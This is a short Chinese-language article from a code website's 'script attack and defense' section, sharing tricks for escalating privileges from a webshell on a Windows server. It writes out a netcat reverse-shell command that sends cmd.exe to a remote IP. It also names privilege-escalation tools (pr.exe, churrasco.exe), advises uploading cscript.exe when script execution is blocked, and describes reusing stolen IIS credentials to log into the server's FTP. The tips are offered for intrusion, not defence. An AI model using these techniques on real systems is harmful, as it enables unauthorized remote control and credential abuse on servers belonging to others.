当前位置: 代码网 > 服务器>网络安全>脚本攻防 > webshell下提权两个小技巧分享

webshell下提权两个小技巧分享

2011年03月31日 脚本攻防 我要评论
webshell下提权两个小技巧分享webshell下提权两个小技巧分享,需要的朋友可以测试下。... 11-03-31
webshell提权小技巧

cmd路径:
c:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。

而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
这个不是重点
我们通常 执行 pr.exe 或 churrasco.exe 时 有时候也需要 按照上面的 方法才能成功。

友情检测波尔远程控制官方网站
作者:myc00l [y.d.t]

第一处:把代码保存为1.vbs 上传到服务器上,执行cscript 1.vbs,又提示拒绝访问。

其实这里,我们只要自己上传一个cscript.exe 一般就可以解决问题,这个程序默认位于系统文件夹下,是win32 控制台下的脚本宿主引擎,用来执行vbs 等脚本程序的。

第二处:用vbs脚本查看到目标iis帐号和密码后,cmd下ftp发现目标用的是微软ftp,直接用iis帐号和密码登录进去了。

iis帐号和密码和微软自带的ftp帐号和密码默认都是一样的。

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com